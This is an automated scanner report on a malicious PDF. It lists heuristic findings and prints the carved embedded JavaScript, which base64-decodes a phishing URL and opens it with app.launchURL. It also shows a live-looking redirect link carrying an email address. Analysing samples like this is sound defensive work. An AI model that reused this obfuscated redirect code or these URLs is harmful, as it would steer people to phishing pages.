MALICIOUS
70
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9996
Heuristics 6
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCHEmbedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.
-
External URI info PDF_URIPDF contains an external URL action
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://t.nypost.com/1/e/r?aqet=clk&r=4&ca=35213807&v0=rhn21600%40gmail.com&uu=65ea915e31188d84ac041994&ru=https://coacher.ro/9000/redirectuser.php#orders@bojtrans.pl Referenced by PDF JavaScript
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0011_000.js |
pdf-javascript-stream | PDF /JS object 11 at offset 0x9F8 | 276 bytes |
SHA-256: 3932d1b5a6b4504fb683a5ef1b9bdceba0e30aed498c07937b22364c777d6c38 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
// EDUCATIONAL DEMO - URL launch technique var e = 'aHR0cHM6Ly9pNnlwLWxkYWgtY211cS5hbXktbGV2eS1kZWNpc2lvbmVkLWNvbS1zLWFjY291bnQud29ya2Vycy5kZXYvNDNhNjZiNGY3Y2EzZDM1Mz9lbWFpbD10YXJnZXQlNDBleGFtcGxlLmNvbSNZVzE1TG14bGRubEFaR1ZqYVhOcGIyNWxaQzVqYjIwPQ=='; app.launchURL(atob(e)); |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.